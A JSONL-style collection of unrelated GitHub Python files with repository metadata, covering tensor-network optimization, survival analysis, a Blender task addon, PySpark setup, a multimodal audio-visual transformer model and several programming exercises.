use_gradient:\n\n # Get gradient\n if use_natural_gradient:\n grad = observer.natural_gradient(conjugate_gradient_method_step, conjugate_gradient_method_error,\n metric_inverse_epsilon)\n else:\n grad = observer.gradient\n\n # Change state\n if use_check_difference:\n showln(\"checking difference\")\n check_difference(state, observer, grad, energy_observer, configuration_pool, check_difference_delta)\n\n elif use_line_search:\n showln(\"line searching\")\n grad *= (state.state_dot() / state.state_dot(grad, grad))**0.5\n grad_step_size = line_search(state, observer, grad, energy_observer, configuration_pool,\n grad_step_size, line_search_amplitude)\n state.apply_gradient(grad, grad_step_size * line_search_parameter)\n else:\n if grad_step == 0 or momentum_parameter == 0.0:\n total_grad = grad\n else:\n if orthogonalize_momentum:\n param = state.state_dot(total_grad) / state.state_dot()\n for index, tensor in enumerate(ansatz.tensors(None)):\n total_grad[index] -= tensor * param\n total_grad = total_grad * momentum_parameter + grad * (1 - momentum_parameter)\n this_grad = total_grad\n if use_fix_relative_step_size:\n this_grad *= (state.state_dot() / state.state_dot(this_grad, this_grad))**0.5\n state.apply_gradient(this_grad, grad_step_size)\n showln(f\"grad {grad_step}/{grad_total_step}, step_size={grad_step_size}\")\n\n # Normalize state\n observer.normalize_state()\n # Bcast state\n state.bcast_state()\n\n # Save state\n if save_state_file:\n write_to_file(state, save_state_file.replace(\"%s\", str(grad_step)).replace(\"%t\", time_str))\n if save_configuration_file:\n write_to_file(sampling_configurations, save_configuration_file)\n\n # Yield the energy\n yield observer.energy\n if sigint_handler():\n break\n","repo_name":"USTC-TNS/TAT","sub_path":"tetragono/tetragono/ansatz_product_state/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":12313,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"7896493292","text":"from models import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.ensemble import ComponentwiseGradientBoostingSurvivalAnalysis\r\n\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\nrandom_state = 64\r\n\r\ncw_gbs = ComponentwiseGradientBoostingSurvivalAnalysis(loss='coxph',\r\n learning_rate=0.1,\r\n n_estimators=1000,\r\n dropout_rate=0.0,\r\n random_state=random_state)\r\n\r\ntimes = np.arange(365, 1826, 30)\r\ncw_gbs.fit(X_train, y_train)\r\n\r\n((train_plot, train_acc_auc), (test_plot, test_acc_auc)) = metrics.c_auc_score(cw_gbs, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_bs, test_acc_bs = metrics.i_brier_score(cw_gbs, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_icpw, test_acc_icpw = metrics.c_index_icpw(cw_gbs, X_train, y_train, X_test, y_test)\r\ntrain_acc_cindex, test_acc_cindex = metrics.c_index_censored(cw_gbs, X_train, y_train, X_test, y_test)\r\n\r\ndraw_plot(['Train', train_acc_cindex, train_acc_icpw, train_acc_auc, train_acc_bs],\r\n ['Test', test_acc_cindex, test_acc_icpw, test_acc_auc, test_acc_bs],\r\n 'CWGBS model')\r\n\r\nwith open('files_cancer_gov/cwgbs.npy', 'wb') as f:\r\n np.save(f, train_plot)\r\n np.save(f, test_plot)","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/cwgbs.py","file_name":"cwgbs.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8098689830","text":"from collections import deque\n\n\ndef find_permutations(nums):\n result = []\n permutations = deque()\n permutations.append([])\n for i in range(len(nums)):\n size = len(permutations)\n for _ in range(size):\n old_permutation = permutations.popleft()\n for j in range(len(old_permutation) + 1):\n new_permutation = list(old_permutation)\n new_permutation.insert(j, nums[i])\n if len(new_permutation) == len(nums):\n result.append(new_permutation)\n else:\n permutations.append(new_permutation)\n\n return result\n\n\ndef main():\n print(\"Here are all the permutations: \" + str(find_permutations([1, 3, 5])))\n\n\nmain()\n","repo_name":"terrifyzhao/educative4","sub_path":"10_subsets/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26913101280","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport plumed_pandas\nimport argparse\nimport numpy as np\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', help='give 2dpmf_clean.txt file', action='store', dest='f', type=str)\n parser.add_argument('-o', help='give path for projected data output', action='store', dest='o')\n args = parser.parse_args()\n\n #open 2dwham output\n df = pd.read_table(args.f, delim_whitespace=True, dtype={'#X': np.float64, 'Y': np.float64, 'Free': np.float64, 'Pro': np.float64})\n\n #computing Prob from free nrg because not enought decimals in Pro column\n df['Pro2'] = np.exp((df['Free'])/-2.494)\n\n #Projection on nCV: adding all proba in same nCV values\n aggregation_functions = {'Pro2': 'sum'}\n df_new = df.groupby(df['#X']).aggregate(aggregation_functions)\n df_new=df_new.reset_index()\n\n #recomputing free from Prob\n df_new['Free2'] = -2.494*np.log(df_new['Pro2'])\n\n #save projected Free_nrg and Prob\n if args.o == None:\n np.savetxt(r'./1dpmf.txt', df_new.values, header=\"nCV Prob Free\", fmt='%.3f')\n else:\n np.savetxt(args.o, df_new.values, header=\"nCV Prob Free\", fmt='%.3f')\n\n# If called from the command line...\nif __name__ == \"__main__\":\n main()\n","repo_name":"jerem2401/scripts","sub_path":"wham/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28666814340","text":"from pipeline import *\n\n\n\nif __name__ == '__main__':\n\n\n\n super_download_folder_title = 'tripadvisor_downloads'\n\n ## The dictionary here was designed to structure downloads in folders based on different criterias\n ## The key in dictionary can be the city, a hotel chain, a country, a continent, etc. \n ## \n search_dict = {\n 'asia':['india'],\n 'europe':['England'],\n 'Continent':['Europe']\n }\n\n \n ## Multiprocessing is used only in one key value pair\n pipeline(super_download_folder_title, search_dict, num_pages = 1, num_workers = 8)\n ","repo_name":"teenaxta/Tripadvisor-Image-Scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15473499586","text":"bl_info = {\n \"name\": \"BTT Blender Tasks Tracking\",\n \"blender\": (2, 80, 0),\n \"category\": \"Object\",\n}\n\nimport bpy\nfrom bpy.types import Panel, Operator\nfrom bpy.props import StringProperty, EnumProperty\n\n# Define task properties\nclass Task:\n def __init__(self, name, description, priority, status, due_date, doer):\n self.name = name\n self.description = description\n self.priority = priority\n self.status = status\n self.due_date = due_date\n self.doer = doer\n\n# Define task list\ntasks = []\n\n# Define task creation operator\nclass BTT_CreateTaskOperator(Operator):\n bl_idname = \"btt.create_task_operator\"\n bl_label = \"Create Task\"\n\n # Task properties inputs\n name: StringProperty(name=\"Task Name\")\n description: StringProperty(name=\"Task Description\")\n priority: EnumProperty(\n name=\"Priority\",\n items=[\n (\"LOW\", \"Low\", \"Low priority task\"),\n (\"MEDIUM\", \"Medium\", \"Medium priority task\"),\n (\"HIGH\", \"High\", \"High priority task\"),\n ]\n )\n status: EnumProperty(\n name=\"Status\",\n items=[\n (\"TODO\", \"Todo\", \"Task not started\"),\n (\"DOING\", \"Doing\", \"Task in progress\"),\n (\"DONE\", \"Done\", \"Task completed\"),\n ]\n )\n due_date: StringProperty(name=\"Due Date\")\n doer: StringProperty(name=\"Doer\")\n\n def execute(self, context):\n # Create task and add to task list\n task = Task(self.name, self.description, self.priority, self.status, self.due_date, self.doer)\n tasks.append(task)\n\n return {'FINISHED'}\n\n# Define task deletion operator\nclass BTT_DeleteTaskOperator(Operator):\n bl_idname = \"btt.delete_task_operator\"\n bl_label = \"Delete Task\"\n\n index: bpy.props.IntProperty()\n\n def execute(self, context):\n # Remove task from task list\n del tasks[self.index]\n\n return {'FINISHED'}\n\n# Define task display panel\nclass BTT_TaskDisplayPanel(Panel):\n bl_idname = \"BTT_TaskDisplayPanel\"\n bl_label = \"Tasks\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"BTT Tasks Tracking\"\n\n def draw(self, context):\n layout = self.layout\n\n # Display task list\n for i, task in enumerate(tasks):\n row = layout.row()\n row.operator(\"btt.delete_task_operator\", text=\"\", icon=\"X\").index = i\n row.label(text=task.name)\n row.label(text=task.due_date)\n\n # Add task creation panel\n box = layout.box()\n box.label(text=\"Create New Task\")\n box.prop(self, \"name\")\n box.prop(self, \"description\")\n box.prop(self, \"priority\")\n box.prop(self, \"status\")\n box.prop(self, \"due_date\")\n box.prop(self, \"doer\")\n box.operator(\"btt.create_task_operator\")\n\n# Register addon\ndef register():\n bpy.utils.register_class(BTT_CreateTaskOperator)\n bpy.utils.register_class(BTT_DeleteTaskOperator)\n bpy.utils.register_class(BTT_TaskDisplayPanel)\n\ndef unregister():\n bpy.utils.unregister_class(BTT_CreateTaskOperator)\n bpy.utils.unregister_class(BTT_DeleteTaskOperator)\n bpy.utils.unregister_class(BTT_TaskDisplayPanel)\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"nafergo/blender-scripts","sub_path":"btt.py","file_name":"btt.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14299338886","text":"#!C:\\Python33\\python.exe\n#https://projecteuler.net/problem=23\nfrom Prime import prime3\n\nceiling = 28123\nfloor = 12\n\ncandidates = set(range(1, ceiling + 1))\nabundent_numbers = []\n\nfor num in range(floor, (ceiling + 1 - floor)):\n if num < sum(prime3.factor_list(num)[:-1]):\n abundent_numbers.append(num)\n\nwhile len(abundent_numbers) > 0:\n addend1 = abundent_numbers.pop()\n\n for addend2 in abundent_numbers:\n abundent_sum = addend1 + addend2\n if abundent_sum > ceiling:\n break\n if abundent_sum in candidates:\n candidates.remove(abundent_sum)\n \n double_addend = 2*addend1\n if double_addend <= ceiling:\n if double_addend in candidates:\n candidates.remove(double_addend)\n \n\nanswer = sum(candidates)\n\nprint(answer)\nfrom tkinter import Tk\nr = Tk()\nr.withdraw()\nr.clipboard_clear()\nr.clipboard_append(answer)\n","repo_name":"JustinL42/Project-Euler","sub_path":"023.py","file_name":"023.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24745402438","text":"import math\r\nprint(\"a*(x^2) + b*x + c = 0\")\r\n\r\nfirstnumber = float(input(\"adad aval ro vared kon\"))\r\nnumber2 = float(input(\"adad dovom ro vared kon\"))\r\nnumber3 = float(input(\"adad sevom ro vared kon\"))\r\n\r\na = math.sqrt((number2 ** 2) - (4 * firstnumber* number3))\r\n\r\nif a > 0:\r\n print(\"javab aval hast\", ((-1 * number2) + a) / (2 * firstnumber))\r\n print(\"javab dovom hast\", ((-1 * number2) - a) / (2 * firstnumber))\r\nelif a == 0:\r\n print(\"javab hast\", (-1 * number2) / (2 * firstnumber))\r\nelse:\r\n print(\"bedeon javab\")","repo_name":"roozbehsaffarkhorasani/assignment4","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"34869701544","text":"import logging\nimport os\nfrom typing import List, Optional\n\nfrom pyspark import SparkConf\nfrom pyspark.sql import SparkSession\n\nSTANDALONE = \"local[*]\"\n\n\ndef quiet_py4j():\n logger = logging.getLogger(\"py4j\")\n logger.setLevel(logging.INFO)\n\n\nclass SparkProvider:\n def __init__(\n self: \"SparkProvider\",\n app_name: str,\n conf: Optional[SparkConf] = None,\n extra_dependencies: Optional[List[str]] = None,\n extra_files: Optional[List[str]] = None,\n ) -> None:\n self.spark = self.set_up_spark(\n app_name, self.master, conf, extra_dependencies, extra_files\n )\n\n @property\n def master(self: \"SparkProvider\") -> str:\n return os.getenv(\"SPARK_MASTER\", STANDALONE)\n\n @staticmethod\n def set_up_spark(\n app_name: str,\n master: str = STANDALONE,\n conf: SparkConf = None,\n extra_dependencies: List[str] = None,\n extra_files: List[str] = None,\n ) -> SparkSession:\n conf = conf if conf else SparkConf()\n\n if extra_dependencies:\n spark_dependencies = \",\".join(extra_dependencies)\n conf.set(\"spark.jars.packages\", spark_dependencies)\n\n spark = (\n SparkSession.builder.appName(app_name)\n .master(master)\n .config(conf=conf)\n .getOrCreate()\n )\n\n extra_files = extra_files if extra_files else []\n for extra_file in extra_files:\n spark.sparkContext.addPyFile(extra_file)\n\n quiet_py4j()\n return spark\n\n @staticmethod\n def tear_down_spark(spark: SparkSession) -> None:\n spark.stop()\n # To avoid Akka rebinding to the same port, since it doesn't unbind\n # immediately on shutdown\n spark._jvm.System.clearProperty(\"spark.driver.port\")\n","repo_name":"MrPowers/quinn","sub_path":"quinn/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"37"} +{"seq_id":"38727589251","text":"# Subject: AISC 1000_02 (Prof. Tim Nguyen)\n# Assignment: Application Excercise 02 s21\n# Student Name & Number: Keval Padsala (500199506)\n# Student Name & Number: Ria Sharma (500199506)\n# Student Name & Number: Archit Verma (500199506)\n\n\nimport os, sys, random\n\n################# <------------- start main region -------------> #################\n\nclass AppExc2s21():\n\n def q1(self):\n print(\"\\nSales Tax Calculator\") ####SALES TAX CALCULATOR####\n\n def take_and_validate_input(): # Validate Input is greater than zero and float or not.\n while True:\n inp = si()\n try:\n inp = float(inp)\n return inp if inp >= 0 else print(inp, \"Input must be greater than 0. Please enter valid input again.\", end=\": \")\n except:\n print(\"\\\"\"+inp+\"\\\" Input is not Numeric. Please enter valid input again.\", end=\": \")\n\n def count_tax_and_sales_tax(taxes): # Print total and sales tax.\n print(\"Total:\", round(sum(taxes),2))\n print(\"Sales tax:\", round(sum(taxes)*0.13, 2))\n\n def count_total_after_tax(taxes): # Print total after tax.\n print(\"Total after tax:\", round(sum(taxes) + sum(taxes)*0.13, 2))\n\n count_more, taxes= True, []\n while(count_more): # Loop with Y/y.\n print(\"ENTER ITEMS (ENTER 0 TO END)\")\n while True: # Loop to take input unitl zero.\n print(\"Cost of item:\", end=\" \")\n inp = take_and_validate_input()\n \n if(inp == 0):\n break\n \n taxes.append(inp)\n count_tax_and_sales_tax(taxes)\n count_tax_and_sales_tax(taxes)\n\n print(\"Again? (y/n):\")\n if si() not in [\"Y\",\"y\"]:\n print(\"Thanks, bye!\")\n count_more = False\n\n\n def q2(self):\n print(\"\\nDice Roller\") ####DICE ROLLER####\n\n def take_and_validate_input(): # Validate Input is betweeen 1 to 6.\n while True:\n inp = si()\n if inp.isdigit():\n inp = int(inp)\n return inp if inp >= 1 and inp <= 6 else print(inp, \"Input must be between 1 and 6. Please enter valid input again.\", end=\": \")\n else:\n print(\"\\\"\"+inp+\"\\\" Input is not Numeric. Please enter valid input again.\", end=\": \")\n \n def roll_names(die1, die2): # Roll dice names(reference: \"https://en.wikipedia.org/wiki/Craps\").\n rolls = {\n (1,1): \"Snake Eyes\", \n (1,2): \"Ace Deuce\", (2,2):\"Hard Four\", \n (1,3): \"Easy Four\", (2,3): \"Five (Fever Five)\", (3,3): \"Hard Six\",\n (1,4): \"Five (Fever Five)\", (2,4): \"Easy Six\", (3,4): \"Natural/Seven Out\", (4,4): \"Hard Eight\",\n (1,5): \"Easy Six\", (2,5): \"Natural/Seven Out\", (3,5): \"Easy Eight\", (4,5): \"Nine (Nina)\", (5,5): \"Hard Ten\",\n (1,6): \"Natural/Seven Out\", (2,6): \"Easy Eight\", (3,6): \"Nine (Nina)\", (4,6): \"Easy Ten\", (5,6): \"Yo (Yo-leven)\", (6,6): \"Boxcars/Midnight\"\n }\n return(rolls[min(die1, die2), max(die1, die2)])\n\n def print_output(die1, die2): # Print Total & Output name.\n print(\"Total:\", die1 + die2)\n print(roll_names(die1, die2))\n\n\n roll_more, taxes= True, []\n \n print(\"Roll the dice? (y/n):\")\n if si() not in [\"Y\",\"y\"]:\n roll_more = False\n\n while(roll_more): # Loop if user wants roll more dice.\n die1 = random.randint(1,7)\n print(\"Die 1:\", die1)\n die2 = random.randint(1,7)\n print(\"Die 1:\", die2)\n\n print_output(die1, die2)\n\n print(\"Roll the dice? (y/n):\")\n if si() not in [\"Y\",\"y\"]:\n roll_more = False\n\n def q3(self):\n print(\"\\nQuestion 3\") ####QUESTION 3####\n list1 = ['Python', 'Maths Data Science', 'Machine Learning', 'Step Presentation', 'Statistical Modelling and Inference', 1000, 1002, 1003, 1004, 1005]\n list2, list3 = [None]*5, [None]*5\n\n print(len(list1), len(list1)//2, -1)\n for i in range(len(list1), len(list1)//2, -1): # Loop in list1 from Length to (length/2).\n rand_choice = random.choice([i for i in range(len(list2)) if list2[i]==None]) #randomly select one from indices which has value None\n list2[rand_choice] = list1.pop() #pop() the value and add into list at radom position\n \n for i in range(len(list1), 0, -1): # Loop in list1 from (length/2) to 0.\n rand_choice = random.choice([i for i in range(len(list3)) if list3[i]==None]) #randomly select one from indices which has value None\n list3[rand_choice] = list1.pop() #pop() the value and add into list at radom position\n\n print(list2) #Print randomly create list2.\n print(list3) #Print randomly create list3.\n dict_l2_l3 = dict(zip(list2, list3))\n print(dict_l2_l3) #Print Dictionary from two lists.\n\n\n\n\ndef main():\n print(\"****Application Exercise 2s21****\")\n\n appExc2s21 = AppExc2s21()\n appExc2s21.q1()\n appExc2s21.q2()\n appExc2s21.q3()\n\n\n################# <------------- end main region -------------> #################\n###### normal io ######\n\ndef ii(): return int(input())\ndef si(): return input()\ndef mi(ss=\" \"): return map(int,input().strip().split(ss))\ndef msi(ss=\" \"): return map(str,input().strip().split(ss))\ndef li(ss=\" \"): return list(mi(ss))\n\ndef read():\n sys.stdin = open('../input.txt', 'r') \n sys.stdout = open('../output.txt', 'w') \n\n\nif __name__ == \"__main__\":\n # read() # uncomment to access an FILE IO.\n main()\n\n\n\n","repo_name":"Keval78/Programming_Solutions","sub_path":"PythonAssignment/AIDS Term1/AISC1000_Application_Exercise_2s21.py","file_name":"AISC1000_Application_Exercise_2s21.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22199424942","text":"import sys\nsys.path.append('..')\n\n\nimport asyncio\nimport async_state\nfrom async_state import *\n\nprint('testing async_state')\n\nmotor_state = AsyncState(['deenergized', 'moving', 'stopped_at_target'])\n\nprint(f'The current state is {motor_state}')\nprint(f'All possible states are {motor_state.possible_states}')\n\n\nasync def test():\n print(f'Set motor to moving!')\n await motor_state.set('moving')\n\n if motor_state == 'moving':\n print(f'Motor is moving!')\n\n if motor_state != 'moving':\n raise RuntimeError(f'Motor is ambivalent!')\n\n if motor_state != 'stopped_at_target':\n print(f'Motor is not at target!')\n\n if motor_state < ['deenergized', 'stopped_at_target']:\n print(f'Motor state is not moving!')\n\n\n print(f'Turning off motor!')\n await motor_state.set('deenergized')\n\n if motor_state < ['deenergized', 'stopped_at_target']:\n print(f'Motor state is not moving!')\n\n\n try:\n if motor_state == 'flying':\n print(f'Motor is moving!')\n\n except BaseException as e:\n print(repr(e))\n\n\n\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(test())\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deniz195/async_state","sub_path":"tests/test_ops.py","file_name":"test_ops.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39027559158","text":"import copy\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom models.build import MODEL_REGISTRY\nfrom models.encoding_helper import SummaryEncoding\nfrom models.bert import (\n BertConfig,\n BertEmbeddings,\n Bert\n)\nfrom models.albert import (\n AlbertConfig,\n AlbertEmbeddings,\n Albert\n)\n\n\ndef _identity(x, attention_mask=None, modality_idx=0):\n return [x]\n\n\n@MODEL_REGISTRY.register()\nclass AVBert(nn.Module):\n \"\"\"\n Multimodal Transformer model builder.\n It builds a multimodal Transformer backbone that takes audio and visual\n sequences as the input.\n \"\"\"\n def __init__(self, cfg):\n super(AVBert, self).__init__()\n self.cfg = cfg\n # Shring across layers\n transformer_cfg_func = \\\n AlbertConfig if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else BertConfig\n transformer_embeddings = \\\n AlbertEmbeddings if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else \\\n BertEmbeddings\n transformer_model = \\\n Albert if cfg.TRANSFORMER.SHARING_ACROSS_LAYERS else Bert\n transformer_cfg = transformer_cfg_func.from_dict(\n {key.lower(): value for key, value in cfg.TRANSFORMER.items()}\n )\n\n self.num_modalities = 2 if 'visual_audio' in cfg.MODEL.ARCH else 1\n self.idx2modality = []\n if 'visual' in cfg.MODEL.ARCH:\n self.visual_conv = MODEL_REGISTRY.get(cfg.VIS.MODEL_NAME)(cfg)\n self.visual_fc = nn.Linear(\n self.visual_conv.head.output_size, transformer_cfg.hidden_size\n )\n self.visual_norm = nn.LayerNorm(\n transformer_cfg.hidden_size, transformer_cfg.layer_norm_eps\n )\n self.idx2modality.append('visual')\n if 'audio' in cfg.MODEL.ARCH:\n self.audio_conv = MODEL_REGISTRY.get(cfg.AUD.MODEL_NAME)(cfg)\n self.audio_fc = nn.Linear(\n self.audio_conv.output_size, transformer_cfg.hidden_size\n )\n self.audio_norm = nn.LayerNorm(\n transformer_cfg.hidden_size, transformer_cfg.layer_norm_eps\n )\n self.idx2modality.append('audio')\n\n self.modality2idx = \\\n {value: idx for idx, value in enumerate(self.idx2modality)}\n\n # BOS embeddings\n self.summary_encoding = SummaryEncoding(\n self.idx2modality,\n transformer_cfg.hidden_size,\n transformer_cfg.use_mean_pooling,\n cfg.DATA.SEQUENCE_LENGTH,\n transformer_cfg.layer_norm_eps\n )\n\n # Modality fusion strategies\n if cfg.MODEL.FUSION == 'early':\n assert 'visual_audio' in cfg.MODEL.ARCH\n for i in range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_embeddings\",\n lambda x: x\n )\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n _identity\n )\n transformer_cfg.num_modality_groups = 1\n self.multi_embeddings = \\\n transformer_embeddings(transformer_cfg, True)\n self.multi_transformer = transformer_model(transformer_cfg)\n elif cfg.MODEL.FUSION == 'mid':\n assert 'visual_audio' in cfg.MODEL.ARCH\n transformer_cfg.num_modality_groups = self.num_modalities + 1\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_embeddings\",\n transformer_embeddings(transformer_cfg, False)\n )\n self.multi_embeddings = \\\n transformer_embeddings(transformer_cfg, True)\n # Sharing across modalities\n if cfg.TRANSFORMER.SHARING_ACROSS_MODELS:\n self.transformer = transformer_model(transformer_cfg)\n for i in range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n self.transformer\n )\n self.multi_transformer = self.transformer\n else:\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_transformer\",\n transformer_model(transformer_cfg)\n )\n self.multi_transformer = \\\n transformer_model(transformer_cfg)\n elif cfg.MODEL.FUSION == 'late':\n transformer_cfg.num_modality_groups = self.num_modalities\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_embeddings\",\n transformer_embeddings(transformer_cfg, False)\n )\n # Sharing across modalities\n if cfg.TRANSFORMER.SHARING_ACROSS_MODELS:\n self.transformer = transformer_model(transformer_cfg)\n for i in range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n self.transformer\n )\n else:\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_transformer\",\n transformer_model(transformer_cfg)\n )\n self.multi_embeddings = None\n self.multi_transformer = None\n else:\n raise NotImplementedError(\n \"Does not support {} fusion\".format(cfg.MODEL.FUSION)\n )\n\n def forward(\n self,\n visual_seq=None,\n audio_seq=None,\n ):\n batch_size, seqlen = \\\n visual_seq[0].size()[:2] if visual_seq is not None else \\\n audio_seq.size()[:2]\n\n # ConvNet\n conv_outputs = []\n _conv_outputs = []\n idx2modality = []\n if 'visual' in self.cfg.MODEL.ARCH and visual_seq is not None:\n nchannels, _, H, W = visual_seq[0].size()[2:]\n vconv_repr = self.visual_conv.get_feature_map(\n [\n t.view(\n batch_size * seqlen,\n nchannels,\n -1,\n H,\n W,\n )\n for t in visual_seq\n ]\n )\n conv_outputs.append(vconv_repr)\n _conv_outputs.append(\n self.visual_conv.get_logit(vconv_repr).view(batch_size, seqlen, -1)\n )\n idx2modality.append('visual')\n if 'audio' in self.cfg.MODEL.ARCH and audio_seq is not None:\n nchannels, frequency, time = audio_seq.size()[2:]\n aconv_repr = self.audio_conv.get_feature_map(\n audio_seq.view(\n batch_size * seqlen,\n nchannels,\n frequency,\n time,\n )\n )\n conv_outputs.append(aconv_repr)\n _conv_outputs.append(\n self.audio_conv.get_logit(aconv_repr).view(batch_size, seqlen, -1)\n )\n idx2modality.append('audio')\n # assert len({len(_conv_outputs), self.num_modalities}) == 1\n modality2idx = {value: idx for idx, value in enumerate(idx2modality)}\n num_modalities = len(idx2modality)\n\n # Transformers\n # Single modality\n # Projection and normalization\n # Prepend summary embeddings\n single_inputs = []\n for idx in range(num_modalities):\n fc = getattr(self, f\"{idx2modality[idx]}_fc\")\n norm = getattr(self, f\"{idx2modality[idx]}_norm\")\n conv_repr_prj = norm(fc(_conv_outputs[idx]))\n _idx = self.modality2idx[idx2modality[idx]]\n single_inputs.append(\n self.summary_encoding(conv_repr_prj, _idx)\n )\n\n att_mask = torch.ones(\n batch_size, 1 + seqlen,\n dtype=torch.long,\n device=_conv_outputs[0].device,\n )\n\n single_outputs = []\n for idx in range(num_modalities):\n s_embeddings = getattr(\n self,\n f\"single_{idx2modality[idx]}_embeddings\"\n )\n s_transformer = getattr(\n self,\n f\"single_{idx2modality[idx]}_transformer\"\n )\n _idx = self.modality2idx[idx2modality[idx]]\n single_output = s_transformer(\n s_embeddings(single_inputs[idx]),\n attention_mask=att_mask,\n modality_idx=_idx\n )[0]\n single_outputs.append(single_output)\n\n\n # Multi modality\n multi_output = None\n if self.multi_transformer is not None and num_modalities == 2:\n multi_input = torch.cat(single_outputs, dim=1)\n token_type_ids = torch.cat(\n [\n torch.zeros(\n batch_size,\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n ),\n torch.ones(\n batch_size,\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n )\n ],\n dim=1\n )\n input_shape = multi_input.size()[:-1]\n position_ids = torch.cat(\n [\n torch.arange(\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n ),\n torch.arange(\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n )\n ]\n )\n position_ids = position_ids.unsqueeze(0).expand(input_shape)\n\n multi_attention_mask = torch.cat(\n [att_mask, att_mask],\n dim=1,\n )\n\n multi_output = self.multi_transformer(\n self.multi_embeddings(\n multi_input,\n token_type_ids=token_type_ids,\n position_ids=position_ids\n ),\n attention_mask=multi_attention_mask,\n modality_idx=self.num_modalities,\n )[0]\n\n return conv_outputs, single_outputs, multi_output\n","repo_name":"sangho-vision/avbert","sub_path":"code/models/avbert.py","file_name":"avbert.py","file_ext":"py","file_size_in_byte":10829,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"13916651323","text":"from questions.question03 import encrypt_message\n\n\ndef test_is_message_equals(capfd):\n \"\"\"\n checks if the output format received by function encrypt_message() will be the same\n as expected given the expected variable\n \"\"\"\n encrypt_message('tenha um bom dia')\n out, err = capfd.readouterr()\n assert out == 'taoa eum nmd hbi '\n","repo_name":"rousuy/Desafio_Programacao_Capgemini02","sub_path":"source/tests/test_question03.py","file_name":"test_question03.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595349268","text":"#!/usr/bin/env python\n\"\"\" Generators for lesson 1 \"\"\"\n\n\ndef intsum():\n \"\"\" yeild the sum of the current and the next number \"\"\"\n total = 0\n next_number = 0\n while True:\n yield total\n next_number += 1\n total += next_number\n\ndef intsum2():\n \"\"\" I think I'm missing something here. I am pretty certain that I was not supposed to create this just to pass the tests.\n yield the sum of the current and the next number\n \"\"\"\n total = 0\n next_number = 0\n while True:\n yield total\n next_number += 1\n total += next_number\n\ndef doubler():\n \"\"\" doubler \"\"\"\n current = 1\n while True:\n yield current\n current *= 2\n\n\ndef fib():\n \"\"\" Fibonacci sequence \"\"\"\n a, b = 1, 1\n while True:\n yield a\n a, b = b, a + b\n\n\ndef prime():\n \"\"\"\n yield prime numbers\n Generate an infinite sequence of prime numbers.\n \"\"\"\n # I found this on stack overflow and really liked how clean it was.\n # Maps composites to primes witnessing their compositeness.\n # This is memory efficient, as the sieve is not \"run forward\"\n # indefinitely, but only as long as required by the current\n # number being tested.\n D = {}\n # The running integer that's checked for primeness\n q = 2\n\n while True:\n if q not in D:\n # q is a new prime.\n # Yield it and mark its first multiple that isn't\n # already marked in previous iterations\n #\n yield q\n D[q * q] = [q]\n else:\n # q is composite. D[q] is the list of primes that\n # divide it. Since we've reached q, we no longer\n # need it in the map, but we'll mark the next\n # multiples of its witnesses to prepare for larger\n # numbers\n #\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 